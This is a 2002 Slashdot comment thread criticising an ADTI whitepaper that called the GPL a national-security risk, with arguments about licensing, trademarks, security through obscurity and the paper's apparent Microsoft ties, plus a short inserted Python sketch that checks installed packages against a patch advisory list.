    While I'm not the biggest RMS fan, uhh, I can't just let that statement go. For once, I agree that not calling it GNU/Linux really misleads readers in this case. Without the GNU tools, Linux wouldn't have a leg to stand on. It's tough to dismiss RMS's importance here (but the author manages somehow..)


    The article goes on (and on and on), but I think it's fair to say that this is a fairly one-sided view of the GPL that looks like it was written by MS and Kenneth Brown just signed his name to it. Nothing here, just the usual FUD.

    • The GPL is one of the most uniquely restrictive product agreements in the technology industry.
      Interesting. I never thought of it that way when I can use a program for whatever purpose I want, make modifications to that program, and distribute either the original or my modified version of that program. Maybe I'm just weird like that...

      Uniquely Restrictive. Break it down. It is restrictive in that it imposes restrictions; It is uniquely restrictive because (gasp) the restrictions it imposes are unique. Just because it's less restrictive than other licenses does not mean that it's restrictive.

      The most important restriction (as noted here, there, elsewhere, and everywhere) is that if you use some GPL code, the whole package has to be GPL. If your app requires a GPL package, then your package has to be GPL. That means that creating a library using GPL code doesn't let you get around the GPL issue, because if that library contains GPL code, it must be GPL'd, and if your app requires that library, it must be GPL'd. LGPL does not have this restriction, as I understand it, but that still doesn't help when something is GPL and not LGPL. So I'm sure you can see why the license would be unattractive to some people. It's not worth it in its own sense to use a GPL license unless there is already a package that does 99% of what you want. If you are trying to further the GPL, then it makes sense to release everything under the GPL, but this is not the government's goal.

      By the early 90's, open source enthusiasts began to view Stallman as an extremist and fanatic. The rise in the popularity of Linus Torvalds and the Linux open source operating system began to create new supporters. Ironically, Linux supporters became the biggest proponents of the GPL. Although Stallman is a fallen hero in the open source world, most open source products today are distributed under the GPL license.
      While I'm not the biggest RMS fan, uhh, I can't just let that statement go. For once, I agree that not calling it GNU/Linux really misleads readers in this case. Without the GNU tools, Linux wouldn't have a leg to stand on. It's tough to dismiss RMS's importance here (but the author manages somehow..)

      I don't think he's a fallen hero either; There are plenty of RMS-following zealots. That's not likely to ever change. While in the end I agree with him to a certain degree - people shouldn't get paid to write software - I also think that people shouldn't get paid to do anything, and we should have a society without money. Since that's not likely to happen any time soon, RMS needs to just get the hell over it. In a society with money, we need to get PAID.

      As for the GNU tools; It is or should be possible to build linux with non-gnu tools. If you started with a complete BSD system with someone else's compiler and compiler tools it should be possible to come up with a version of the linux kernel which is completely portable. (I don't know if linux builds with any other toolchains right now... does it? Like Sun's SPRO compiler and related tools, or watcom?) Anyway, it's called linux. Maybe every distribution of linux extant today should be called (packager) GNU/Linux (Redhat GNU/Linux, for example.) But Linux is Linux, we all know what it is, and the average man on the street couldn't give a fuck about GNU, he just wants to know that he can load the OS and get work done, whether that's windows or linux, and tacking GNU/ onto the front of a word isn't going to change that. Besides which, it's cumbersome; Even if the entire OSS world decided to call it GNU/Linux, people would still call it Linux. So just build a bridge, and get over it.

      As for your one-sided view issue; If we're talking about national security, it's going to be written from a paranoid mindset, and rightfully so. Better to be paranoid and duplicated work, with code not released to the public, than to fuck up and install a fat backdoor that lets skript kiddies fuck around with our nation's communications, for example. You know, like the private telecom system...

      • by RoninM ( 105723 ) on Monday June 10, 2002 @03:50PM (#3675050) Journal
        Uniquely restrictive. Break it down.

        Except that it's "MOST uniquely restrictive." It's already been established (in other comments) that this Think Tank consists of so many high-minded, conceptual thinkers that there was no room for a grammarian. Even still, I have to give them the benefit of the doubt and assume they meant "most ... restrictive," and not the completely daft, "most uniquely."

        The most important restriction (as noted here, there, elsewhere, and everywhere) is that if you use some GPL code, the whole package has to be GPL. If your app requires a GPL package, then your package has to be GPL. [...yawn...] So I'm sure you can see why the license would be unattractive to some people.

        First, I've never heard of anyone absolutely needing to use GPL code in their package. You can choose to do so or not. Of greater import, however, is that despite your keen insight that some people just won't understand/like the viral nature of the GPL, this whitepaper isn't purporting to be opinion, but a factual analysis of the risk inherent in the GPL. Additionally, you fail to point out that even if the resulting package is GPL, that doesn't oblige you to distribute it, and thus, you don't have to release the source code.

        If we're talking about national security, it's going to be written from a paranoid mindset, and rightfully so.

        Okay, fine, I'll (temporarily) accept that paranoia is a good thing, here. But this is just one paranoid view. Another paranoid view is that with the number of foreigners employed in the tech sector, terrorists could already have been introducing backdoors into closed source products for years, now. Another paranoid view is that computers are inherently dangerous, electricity is the spawn of Satan, and we should all call each other Jebidiah, raise barns, churn butter, and sell cocaine. There's lots of paranoid views. Just because you think paranoia is acceptable in this instance doesn't do anything to validate the views expressed in the whitepaper. A lot of people, these days, have eschewed critical thinking for mindless support for whatever's been pushed to "stop the terrorists." It's both wrong and dangerous, even in paranoid times.

        Of course, paranoia isn't the right framing for anyone, anyway. Rational risk analysis is, and always has been, better. There's a massive divide between planning for the Worst Case Scenario and outright paranoia. We'd be wiser to not ignore it.

  • Microsoft advocacy (Score:5, Insightful)

    by magi ( 91730 ) on Monday June 10, 2002 @01:52PM (#3674131) Homepage Journal
    You might want to take a look at their technology pages [adti.net], especially the Anti-trust & Internet Regulation Program [adti.net] and Intellectual Property Program [adti.net] sections.

    Many of the headlines are quite revealing about their intentions. Many are about the importance of MCSE:

    • Inc. 500 Shops Value Certification Most (MCSE vs college degrees)
    • Familiarity Breeds Respect

      "Recruiters tend to hire MCSEs just as often, if not more so, than those with a four-year college degree."

    • Technology Trends: Program Provides Information For New Age

      "Eighty-seven percent of human resource managers surveyed believed that MCSE's are equally or more successful than college students."

    • The Impact of Technology Training Programs Case Study: MCSE Training
    And then there are numerous anti-trust criticism articles:
    • Break up Microsoft? Rest of world pooh-poohs the notion
    • Press Release: Japan, Switzerland, and the EU do NOT insist on breakup of Microsoft, unlike the U.S.
    • Fine Microsoft, use funds for new competition (anti-breakup)
    • Fine Microsoft and use funds to catalize new competition (anti-breakup)
    • Break-up Remedy for Microsoft Not Supported by Key Democrats
    • Technology and The Congressional Black Caucus (Microsoft anti-trust)
    • Breaking Windows Over Antitrust Dogma
    • Pause the Microsoft Case and Examine U.S. Anti-trust Policy
    • Punishing Winners Hurts the Marketplace
    • Suit Threatens U.S. Computer Dominance
    • Taking a Byte Out of Microsoft
    Etc. Also lots of articles about the precious intellectual property rights, although not specifically in relation to Microsoft.

    Make your own conclusions freely.

  • What I'd like explained to me is how the GPL could be considered somehow worse than other open source licenses for the purposes of national security. The apparent concern in using GPL software is that the source code is out there and available for hackers to look at. Even if you accept the logic that having that source code publicly available is more dangerous, I don't see how that would be different with a BSD style license.

    I could, as a proprietary vendor, take a BSD style license product, and close it up and sell it to the government. At that point though, until I start adding modifications, there is no reduction in the risk of some outside source finding a bug in the code. Once I do make modifications, there's the risk of complacency. Perhaps the government doesn't realize that the code I sold them is based on a buggy open source implementation and is thus vulnerable to a potential security breach.

    This just reeks of having been written by Microsoft's PR department.

    Oh, and one more comment. The notion that the GPL is somehow one of the most restrictive licenses is complete hogwash. Does Microsoft let you incorporate the Windows source code into your product under ANY circumstances? Hell, they don't even let you see the source code in the first place (and thank god, since it's apparently riddled with big security holes). So how is that MORE restrictive?

    MMMMMM a big steaming pile of FUD!
  • For example, if the Federal Aviation Agency were to develop an application (derived from open source) which controlled 747 flight patterns, a number of issues easily become national security questions...

    FAA controlling the flight patterns of any aircraft is absolute nonsense! First, every pilot in the system would block it before it ever got past the talking stage, second it is just ignorant.

    Maybe software to control the traffic flow? Sorry, that deflates this FUD too, since it would not apply to just one airframe and the author assumes that the people operating the aircraft are just going to let that happen too.

    Maybe if he said some more nonsense about the FAA requiring all 747s to have this software? Nope, that is the NTSB and the manufacturers, and the latter would be marching on Congress like you've never seen before!

    Hmm, here is a more believable thing to scare people with: "what if all automated traffic light systems had to run Open Source, could you imagine the national security issue of flashing red lights all over the heartland"?
    • While you make good points about why the example could not be, you never address the concerns of the example. This can be used for any number of other "sensitive" applications. If carnivore was Open Source, would it potentially be more open to being compromised? If the DOD systems were open source, would they be more open to being compromised?

      This is a valid concern about using OSS for "sensitive" applications. Yes, in theory, more eyes means more bugs found. But most "sensitive" applications are not the type that lots of people would be interested in running, so most people would not find the bugs. But the source always is there for black hats to look at, and if they find a bug before anyone else, they can exploit it. You can pooh-pooh the idea all you want, but the added safety that obscurity gives you must be weighed against the added benefit OSS would give you. Depending on the system, obscurity may win.
      • You are correct. The source code for these types of sensitive niche programs probably should be under lock and key, as the only people interested in taking a look at the source are those people who are looking for holes that they can exploit. However, there is nothing in the GPL that requires that you put your source code up on an FTP server. You are just required to turn over source code to software to the people that received binaries from you. If you only distribute binaries to one organization (like the DOD), then you only have to release the source code to one organization.

        It is also probably a good idea to build your system on Free Software components that do get a lot of use. Borland's Interbase had a secret backdoor password until it was released as a Free Software project just recently. If you based your top secret application on Interbase you could very easily have introduced a back door via the commercial software you used as the back end. In other words, for those parts of your project where you are utilizing commodity software (a database, an office suite, a web browser, etc.) you should be using something that comes with source code.

  • by Anonymous Coward on Monday June 10, 2002 @01:53PM (#3674140)
    This paper was prepared as part of The MITRE Corporation's FY00 Mission-Oriented Investigation and Experimentation (MOIE) research project "Open Source Software in Military Systems." This paper analyzes the business case of open source software. It is intended to help Program Managers evaluate whether open source software and development methodologies are applicable to their technology programs. In the Executive Summary, the paper explains open source, describes its significance, compares open source to traditional commercial off-the-shelf (COTS) products, presents the military business case, shows the applicability of Linux to the military business case, analyzes the use of Linux, discusses anomalies, and provides considerations for military Program Managers. The paper also provides a history of Unix and Linux, presents a business case model, and analyzes the commercial business case of Linux.

    Here [mitre.org]
  • by redmoss ( 108579 ) on Monday June 10, 2002 @01:56PM (#3674161) Homepage
    Remember the difference between the BSD-style and GPL-style freedoms are very important to MS. MS says BSD-licensed open code is good. Since MS can use it without contributing back, this is the kind of "free" that MS likes.

    MS also says GPL-licensed open code is bad. Since MS can't use it without contributing back, it can only be used by MS's free-software competitors, thus MS strongly dislikes this kind of "free".

    Now back to this study. Can anyone find the basic message surprising? "BSD code is benign, GPL is threatening". Microsoft-funded study, Microsoft-approved results.

    As a side note, if MS didn't make this distinction and got everyone upset about using *any* free/open code, everyone would *also* have to stop using MS software. Remember, significant portions of their OS are built upon BSD-licensed code.
  • Trademarks (Score:4, Insightful)

    by DustMagnet ( 453493 ) on Monday June 10, 2002 @01:58PM (#3674178) Journal
    "On a lighter note, while many open source enthusiasts are proponents for copyleft, they insist on trademark protection for their ideas."

    I have a hard time taking anyone seriously who could write that.

    Trademarks protect product labeling. Patents protect ideas.

    Unlike patents and copyrights, trademarks are there to protect consumers. If I go to the store and want to buy Kraft mac and cheese, I don't want to have someone labeling some other brand as Kraft. If it says RedHat, it should be from RedHat.

    The idea behind open source and trademarks is to help the end user. I don't see how they are incompatible.

  • "Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."

    And how is this more dangerous than a proprietary vendor discovering a flaw in their product, keeping quiet and not fixing it because it costs too much money?

  • "On a lighter note, while many open source enthusiasts are proponents for copyleft, they insist on trademark protection for their ideas."

    I'm missing the joke, here. Copyright and Copyleft rights aren't the same thing as trademarks at all, and it's perfectly acceptable to enforce your rights under one but not the other. Or neither, or both, as is your wont.

    Whatever irony the author tried to find in this alleged stance by "many open source enthusiasts" is lost on me.

  • by BranMan ( 29917 ) on Monday June 10, 2002 @02:00PM (#3674204)
    The FAA has incredibly strict requirements for software critical to keeping a plane in the air. Open Source or not, every single line must be proven to do exactly what it needs to, and the entire system must be deterministic (meet real-time requirements, such as knowing the maximum latency for interrupt processing). The FAA itself should be giving these jokers an earful - this is pure FUD.
  • It's true that hackers could find exploits if they had the source -- but is that any worse than just having the exploits freely available, as is the case with (e.g.) Internet Explorer?

    If the government really has a problem with open source, they can go ahead and contract to reimplement things from scratch. But for non-classified applications (such as serving documents available under the Freedom of Information Act), I see nothing wrong with open source solutions, especially if it can save the taxpayer some money! www.doe.gov, incidentally, is running Apache.
    • Re:Which is worse? (Score:2, Interesting)

      by grungeKid ( 4260 )
      www.doe.gov, incidentally, is running Apache.

      Funnily enough, so does ADTI.

      HTTP/1.0 200 OK
      Date: Mon, 10 Jun 2002 19:41:00 GMT
      Server: Rapidsite/Apa/1.3.20 (Unix) FrontPage/4.0.4.3 mod_ssl/2.8.4 OpenSSL/0.9.6
      Last-Modified: Mon, 10 Jun 2002 06:09:04 GMT
      ETag: "9020935-1af5-3d044280"
      Accept-Ranges: bytes
      Content-Length: 6901
      Connection: close
      Content-Type: text/html

  • "The federal government's information systems requirements intersect countless sensitive operations."

    If the federal government has done nothing wrong then I'm sure it has nothing to hide.
  • Vintage 1999 FUD (Score:5, Interesting)

    by ctid ( 449118 ) on Monday June 10, 2002 @02:01PM (#3674215) Homepage
    It's well worth reading the paper, because it's actually quite funny. But the thing that strikes me most about it is just how old fashioned it seems. I mean he advocates security through obscurity for God's sake! He believes that open source SW can't compete with closed source software, although he talks about Apache in the paper. He's clearly completely unaware of what the GPL represents and how it works.


    Of course any normal person would be utterly humiliated to have their name associated with this piece of nonsense. Perhaps that's why it has been pulled? I'd be interested if Microsoft really did pay for it. If so, I think they should feel a little cheated. The standard of FUD required in 2002 is far higher than this. Even the mainstream press are going to tear this crap to pieces.

  • by ansible ( 9585 ) on Monday June 10, 2002 @02:01PM (#3674217) Journal

    I love the quote on backdoors and viruses. Windows systems don't have their source code publicly available, and yet that doesn't seem to stop the creation of backdoor programs and viruses.

    I like how they insinuate that people would just download some code from the Internet, and then immediately put that into a production air traffic control system. Talk about a straw man argument.

    Someone needs to explain to this think-tank (or senseless-opinion-tank) that people can do these things called code reviews. Ya see, if I download a new version of this mail client (for example), I can look at the differences between the current source and the last version I checked. Not only could I spot back doors, but I'd likely find some bugs too.

    These guys that develop safety-critical systems (like air traffic control) are real sticklers for inspections, documentation, etc. I bet most of them would be glad for more independent reviews of the code they depend on, rather than just hoping Windows doesn't have bugs in it.

    As for me, my requirements aren't as critical. When I downloaded OpenOffice from some mirror in Timbuktu, all I did was check the MD5 sum. The five seconds that took assured me that at least no third party inserted viruses or back doors in the program.

    • Windows does not have any intentional backdoors, it's just an OS that was designed for features and the security of a "disconnected environment". The second everyone got onto the Internet, MS realized the importance of security as hole after hole was announced. However, it's very difficult to take away features, and it takes a long time to roll out a fundamentally different design. Regardless, Windows' security (or lack thereof) has nothing to do with the fact that it's Closed Source. There are many other commercial and Closed Source OS's, banking software, etc. that have incredible security. Actually, the only OSS OS (say that 3 times fast!) that I know of that's really secure "out of the box" is OpenBSD.

  • Just in case everybody ./'s everyone else's mirror... http://balloons.space.edu/old_opensource_whitepaper.pdf
  • by SirSlud ( 67381 ) on Monday June 10, 2002 @02:04PM (#3674239) Homepage
    They play it as if it is, but by saying open-source good, GPL bad, they are clearly desperately attempting to keep the sea full of fish for MS when it needs a chunk of [stable and useful] code here and there for their projects. They hate the GPL 'cause there's no way they'll GPL the whole damn OS .. so this attack is specifically targeted at the GPL, with purely financial intentions in mind. The security angle is clearly just a way of getting people to read it, and to associate GPL with 'problems'. I'd imagine most decision-makers won't have to remember what those 'problems' are (much less understand them), but so long as they walk away going, 'open source good' (so MS can borrow at will, remember how much they like the BSD license), 'GPL bad', they've done their job.

    Ironic, huh? MS has the power and might to take and use, and they don't perceive having to apply the same standards as their code-base contributors (ie, the borrowed code) to their own product. It's flat out hypocrisy to anyone with half a clue .. fortunately for them, in this day and age of specialization and legal and technological complexity, that's 99.9999% of the population on any particular issue.

    Fuck 'em and their shareholders.

    I assume by decrying the GPL for security, their lame argument is .. "well, open source is fine, so long as we can keep the parts actually keeping the system secure obscured behind closed source?"

    So then why is open-source good? Seems to me that security is 80% of the benefit of open source. I guess MS's story is, 100% of the benefit of open source is 'borrowing' code, and 0% is security. Not surprising, but still infuriating.
  • Register Response (Score:2, Informative)

    by Blasphemy ( 78348 )
    Check out Thomas Greene's article [theregister.co.uk] at the Register [theregister.co.uk], a great critique.
  • by elfdump ( 558474 ) on Monday June 10, 2002 @02:09PM (#3674273)
    The open source debate is about keeping secrets. Completed (written) software is often locked by its programmer, hiding the underlying code from its user.

    Not so sure about this... I think we've all met programmers whose binaries were more readable than their source.

    ;)
  • by reaper20 ( 23396 ) on Monday June 10, 2002 @02:11PM (#3674292) Homepage
    NIH syndrome is more prevalent than people blatantly ripping off open source code or committing 'acts of IP theft'. I think more so than people give it credit for.

    Even Mandrake rewrote their installer to "differentiate" from Red Hat. Red Hat doesn't include fontdrake, or any of their competitors' GPL tools. It seems a lot more like a bazaar of cathedrals, to use the analogy.

    If I write the ultimate Linux app, what are the chances that someone is going to 'steal my IP', or even if it is GPL, contribute back? Look at the ton of duplicate GPL programs.

    If I were a programmer I think I'd GPL my software so people can look at the code and contribute patches - chances are some other OSS programmer is going to not like the language it was written in, which widget set I used, or whatever, and just rewrite it to suit their needs.

    I have no numbers to back this up, just seems that most programmers and/or companies prefer to write their own software, regardless of reusable code or license.
  • by MountainLogic ( 92466 ) on Monday June 10, 2002 @02:12PM (#3674303) Homepage
    How many thousands of unknown contract programmers have worked on MS code? Does MS do any federal background security checks? No!

    If we blindly take the assumptions of this article then only some DoD funded Unix should be used for Mission/Life critical systems.

    • Does MS do any federal background security checks?

      The moderators see fit to mod you up but you have no factual basis for your claims. I know people who are contractors at MS, and full time employees. First, they do a pretty good background check on you. But that's really the point. Code just doesn't get checked in to CVS (lol!) without any sort of peer review and approval process. Think about OSS - can I, someone who has never hacked on a kernel, and someone who doesn't like GPL'd software, write some crap code and check it in to the Linux source tree?
  • The appendix listing open source licenses is missing one obvious license: the Microsoft Shared Source License (SSL) (www.microsoft.com/licensing/sharedsource/default.asp) under which you can download stuff like the Java killer (aka .NET) open source project.

    Wondering if this is not considered an Open Source license enough after all, even with all the fuss that Microsoft made about it...

    Microsoft is just playing the game they want here, one day supporting Open source, the other day, bitching about it. Make up your mind, MSFT!

    PPA, the girl next door.
  • by pjrc ( 134994 ) <paul@pjrc.com> on Monday June 10, 2002 @02:17PM (#3674339) Homepage Journal
    Obviously they've never actually read any of those proprietary EULAs before they clicked ok.

    The GPL is one of the most uniquely restrictive product agreements in the technology industry.

    And, Yes, they have clicked ok to proprietary licenses much more restrictive than the GPL. These lines appear within their PDF file:

    /Producer (Acrobat Distiller 4.0 for Windows)

    /Author (default)
    /Creator (ADOBEPS4.DRV Version 4.24)
    /Title (Microsoft Word - sullivan.doc)

    This simple fact can be easily verified with a command such as "strings old_opensource_whitepaper.pdf | grep ^/"

  • Would it be prudent for the FAA to use software that thousands of unknown programmers have intimate knowledge of for something this critical

    How many people have intimate knowledge of the internal code is irrelevant. What is relevant is how many experts have examined the code to be sure that it is correct. Before code is used for something like flight control I would expect experts to examine it closely to be sure it worked right. (actually not, game programmers with an AI can probably do a better job just rewarding their system for smooth flights even in turbulent weather, but that is a different debate)

    100 experts paid by the government to assure the code is correct is not as good as 100 paid experts, plus 1000 amateurs doing the same. And the existence of a few amateurs sabotaging their work makes it better because it forces the experts to think things through. (when everything is expected to work you can be lazy with the rubber stamp, when some parts are suspected to be sabotaged you have to look closely)

    There is a theory of testing which says you put some number of known bugs in the code without telling the testers. Don't stop testing until they find all the known bugs because that gives you the best chance of stumbling across the unknown bugs. (the counter argument is fixing known bugs can introduce more so it isn't a clear win, but it is still a point to consider)

  • Programmers that make a living leveraging the unique value of their software, do whatever it takes to keep their code secret. As expected, most successful programmers and companies do not disclose their code and sell their software without the source code.

    I guess you are probably not successful if you program open source. What do you suppose he means be successful?

  • by Hnice ( 60994 ) on Monday June 10, 2002 @02:33PM (#3674440) Homepage
    "If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? "

    first of all, if the 100 hours is GPLd, then the GPL isn't 'arguing' anything -- the rest *is* GPLd, according to the GPL. using the verb 'argue' here is like saying that my rental agreement 'puts forth the assertion' that i have to pay my landlord every month. it's not appropriate, because there's nothing to argue, no ambiguity. the GPL is very clear here.

    second, if GPL'd software is, as the statement is clearly implying, a negligible part of the final product, what's the big deal with spending the other 100 hours to build that part yourself? no one's making you use that 100 hours worth of software.

    and imagine how stupid that argument sounds when phrased this way: "i just built a huge program that only makes use of [some copyrighted product] in passing -- why should i have to conform to that company's contract terms in order to use it?" would anyone argue that degree of use is going to make any difference at all here? and if you don't like corporate-bashing, consider this example -- "sure, i stole $100 from you, but i put it towards this car that cost $5000, so why should I owe you anything at all?"

    this is a stupid point. if you don't want to use GPLd code, don't, and if you do, understand the terms.
    • first of all, if the 100 hours is GPLd, then the GPL isn't 'arguing' anything -- the rest *is* GPLd, according to the GPL.

      People make this mistake all the time, but it is a mistake. If someone includes some GPL'ed work into a larger work, the larger work is not magically licensed under the GPL. (Nor, for that matter, is the copyright of the larger work magically made the property of the FSF). Instead, what becomes true is that the ensemble work cannot be legally distributed without violating the terms of the (GPL) license for the 100 hours.

      In this eventuality, what would happen would be that the copyright holder for that 100 hours of labor would sue the infringer, and in the best of all worlds, the infringer would be obligated through an injunction to cease distribution of the offending code. If the copyright holder for the 100 hours was willing, some monetary arrangement might be reached in return for an alternate license for the 100 hours of code.

      The problematic case is where the 100 hours of code was written by five coders spread over the planet, and nobody bothered to track who had copyright over what piece of the code. In that instance, all five coders should agree to the relicensing. If one of the coders does not agree to the relicensing, then the problem of how to clean up the 5000+100 hours of code devolves into one of cleaning up the 100 hours of code.

      There is nothing in the GPL that forces anyone to license code under the GPL, no matter how Microsoft may wish to construe it.

  • GPL fair? (Score:2, Redundant)

    by forehead ( 1874 )
    "If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL?

    This "argument" really bothers me. What would they say to this: "If a software application representing 5000 hours uses proprietary code reflecting only 100 hours, should the author really be guilty of copyright infringement?"

    Last time I checked, no one was forced to use GPL code in their products. I think everyone would agree that the author of a piece of code is well within their rights to dictate the terms under which other people are allowed to use it. People who use the GPL effectively say, "I will share my code with you, however, you must share your code with me if you intend to use my code in your project".

    Some people (e.g. those who use the BSD license) don't mind if others use their code without sharing in return. That is their prerogative.
  • This story came out early last week and is just a load of FUD. ADTI has no credibility and is funded by MicroSoft (which Microsoft admitted to).

    These are the same guys who claimed that second hand smoke isn't harmful. Their panel of experts contained Scientists and Doctors who had previously been employed by the Tobacco industry.

    Article Link [smokefreeforhealth.org]

    Do a search for ADTI in article.

    You can view the article at Phillip Morris Tobaccos archive.
    See:

    Article Link [pmdocs.com]

    Or the PDF at:

    PDF Link [pmdocs.com]
  • There are hundreds of comments posted on /. every time some think tank, government sheep, or microsoft sponsored clone writes some disparaging article about open-source software, and that's all good, you all make wonderful points. However, sitting at your computer bitching to this site won't ever do much good, as I'm fairly certain all those clones, sheep, and "thinkers" will never hear a word of it.

    If you have something to say, why not start a petition? Why not write a well-written (as opposed to the one above) article and try to have a newspaper or respected journal publish it? Write your congressman (as I have done) and explain in a well-thought-out manner the points and counter points of why open source software is essential in maintaining the rate of innovation in the computer industry.

    I'm not complaining, or trying to be a troll, but even if you copied and pasted some of these very good comments that appear here into an e-mail to some of the powers that be, it would do far more good, and would probably make you feel much better about your day as well.

    Just my $0.02.

  • Yes, Microsoft's security sucks, and every one knows there are open security holes, and it takes ages for them to be patched... But Microsoft's OSes do have one advantage over all the current open source OSes -- Windows Update.

    It may take MS too long to patch their stuff, but when the patch does come out, access to that patch is quick and easy. An update facility for *nix would be a huge step in combatting bugs and security problems. The facility need not be centralized, either; individual distributions or packages could have their own repositories.

    Such a system could even go one step further than Microsoft and report when an unpatched hole is found, and give the option to disable that service 'til a fix is discovered. This would be highly appropriate for individuals, companies and governments who are worried about keeping their systems secure, and would keep them safer than any closed-source software can.
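
A sketch of the per-distribution advisory check the comment above proposes, as an added example that is not part of the original post: the package names, versions and advisory feed below are constructed for the example, versions are assumed to be plain dotted integers, and an advisory with no fixed version is taken to affect every installed version of its package. The output is an action list: upgrade where a fix exists, and disable the exposed service where one does not yet.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Advisory:
    package: str
    fixed_in: Optional[str]   # first fixed version; None while no patch exists yet
    service: str              # service to switch off while the hole is unpatched


def parse_version(v: str) -> tuple:
    """Dotted numeric version ("1.4.12") -> comparable tuple of ints.
    Assumption for this example: no letters or release suffixes."""
    return tuple(int(part) for part in v.split("."))


def plan_actions(installed: dict, advisories: list) -> list:
    """Match an advisory feed against the local package inventory.

    Returns tuples of the form
        ("upgrade", package, fixed_version)  when a fix is available, or
        ("disable", package, service)        when the hole is known but unpatched,
    and nothing for packages that are not installed or already fixed.
    """
    actions = []
    for adv in advisories:
        current = installed.get(adv.package)
        if current is None:
            continue                                   # not installed here
        if adv.fixed_in is None:
            actions.append(("disable", adv.package, adv.service))
        elif parse_version(current) < parse_version(adv.fixed_in):
            actions.append(("upgrade", adv.package, adv.fixed_in))
    return actions


# Constructed advisory feed and inventory (hypothetical packages and versions).
ADVISORIES = [
    Advisory("examplehttpd", fixed_in="1.4.5", service="examplehttpd"),
    Advisory("exampleftpd", fixed_in=None, service="exampleftpd"),   # no patch yet
    Advisory("exampledns", fixed_in="3.0.1", service="exampledns"),
]
INSTALLED = {"examplehttpd": "1.4.2", "exampleftpd": "2.1.0", "exampledns": "3.0.1"}


if __name__ == "__main__":
    for action in plan_actions(INSTALLED, ADVISORIES):
        print(*action)
```

In a real deployment the feed would be fetched per distribution or per package repository, as the comment suggests, and its authenticity verified before any of these actions is taken automatically.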
  • by kindbud ( 90044 ) on Monday June 10, 2002 @02:52PM (#3674615) Homepage
    On a lighter note, while many open source advocates are proponents for copyleft, they insist on trademark protection for their ideas.

    You bet they do, or else commercial interests would steal their work and profit from it, without due compensation to the creator.

    I hear the Red Cross and Salvation Army have trademarks as well, which they zealously protect, even though they are in the business of giving stuff away to those in need.

    The Free Software Foundation, the Open Source Initiative and a number of other organized GPL enthusiasts protect their "marks"...

    Putting the word "marks" in quotes in this context seems to imply that not-for-profit trademark holders are not holding "real" trademarks, and therefore the author of the paper feels entitled to sneer at them.

    ...by posting notices in publications and websites that their trademarks are protected. For example, the notice on the OSI website reads, "... To identify your software distribution as OSI Certified, you must attach one of the following two notices..." The same is true for a number of prominent open source firms including VA Linux.

    This is the most damning section of the entire document, in my opinion. The author betrays his contempt for the fact that open source advocates utilize the copyright system as it was intended: to control the distribution of their works. What burns this author the most however, is that he knows they are correct and the GPL succeeds at its aims, which is preventing GPL code from being hijacked by proprietary, closed source projects. This makes him very angry, and he can barely conceal it in this paragraph.

    While each of these firms would insist that they are not against copyright protection, invoking the protections argues that they are against people copying their marketing documents and symbols.

    He left out the crucial phrase at the end of the sentence: "without authorization." This guy is really burned that the GPL is successful. And it seems clear to me now that "this guy" is the Microsoft FUD^WMarketing department. Their past FUD releases on this topic have been infamous for conflating trademark and copyright, as well as copyright and copy-prevention.

    Now I gotta go take a walk, because I am worked up. But man, this is the most blatant and desperate FUD I have read in a long, long time.
  • by Internet Dog ( 86949 ) on Monday June 10, 2002 @02:53PM (#3674625)
    From Page 12:
    When a software product is sold, it represents the efforts of a diverse team of individuals. The revenue from software compensates engineers, graphic artists, database programmers, hardware specialists, debuggers and a multitude of contractors, partners and vendors.
    In the U.S., the software sector accounted for approximately 319 million jobs in 2001 (see Appendix 8). Software development usually reflects very thin operating budgets and small margins for mistakes. Even after a software application is released, it is often not profitable until its second or third version. The developer must finance both the initial development phase and later modifications. Modifications
    This is interesting, approximately 111% of the U.S. population is employed in the software sector.

    According to the BLS Computer and Mathematical Occupations [bls.gov] employ 2,932,810 total employment. Of those 374k are employed in the development or the customization of applications.

  • Challenge accepted (Score:5, Interesting)

    by ninewands ( 105734 ) on Monday June 10, 2002 @03:42PM (#3674985)
    "Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."

    And your point, Mr. Brown, is exactly what?

    First point: Today I mistakenly started up IE's infamous "Windows Update" feature for the Win2K installation on the SunPCI card in my Ultra 10. The first "update" it wanted to install was the MS "Automatic Updater" so that Microsoft could cram changes to my system software down my throat whenever they chose to. Mr. Gates does not own my hardware, the State of Texas does. Given Microsoft's track record in the security area, please explain to me the exact difference between this "feature" and a "back door or worse, a dangerous virus"?

    Second point: Microsoft's "Windows update" service is ONLY available over the internet and is usually the ONLY source for critical security fixes and other patches for Microsoft products. Please tell me exactly how that differs from the normal distribution channel for GPL software.

    Reverse engineering "harbors very close to IP infringement because and has staggering economic implications."

    Please show me your bar number before you start rendering legal opinions, Mr. Brown. The only class of Intellectual Property that is infringed by reverse engineering is patents. Specifically, so-called "clean room" reverse engineering of copyrighted works has been repeatedly blessed by the courts as an exercise of the fair-use doctrine.

    "On a lighter note, while many open source enthusiasts are proponents for copyleft, they insist on trademark protection for their ideas."

    Mr. Brown, this "lighter note" comment of yours is little more than a cheap shot that openly displays your lack of understanding of the subject matter on which you write.

    "Open source enthusiasts" not only avail themselves of trademark protection, they also assert and defend their rights as copyright holders. This in no way conflicts with their advocacy of the principle of copyleft. What it DOES do is give them the power to enforce the particular license (GPL, LGPL, BSD, or other) under which they choose to release their software.

    "If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? This point is of considerable concern to software companies that value their secrets, design and architecture strategies. Proponents of the GPL argue that each party in the exchange is benefiting equally, but without a means to properly make this evaluation, this position at best is over-assuming."

    Answering your questions in order:

    Yes, if it's my GPL code, it most certainly IS fair. If Microsoft, Adobe, Symantec or whoever, wants to license my code for use in their proprietary product, I will be HAPPY to negotiate a special *non-exclusive* license with them for a SUBSTANTIAL fee. HOWEVER, if their objective is to take my code without payment and claim it as their own they had better be ready for MAJOR litigation.

    "The federal government's information systems requirements intersect countless sensitive operations. The limitless potential for holes and back doors in an open source product would require unyielding scrutiny by staff that decided to use it. For example, if the Federal Aviation Agency were to develop an application (derived from open source) which controlled 747 flight patterns, a number of issues easily become national security questions such as:
    Would it be prudent for the FAA to use software that thousands of unknown programmers have intimate knowledge of for something this critical?
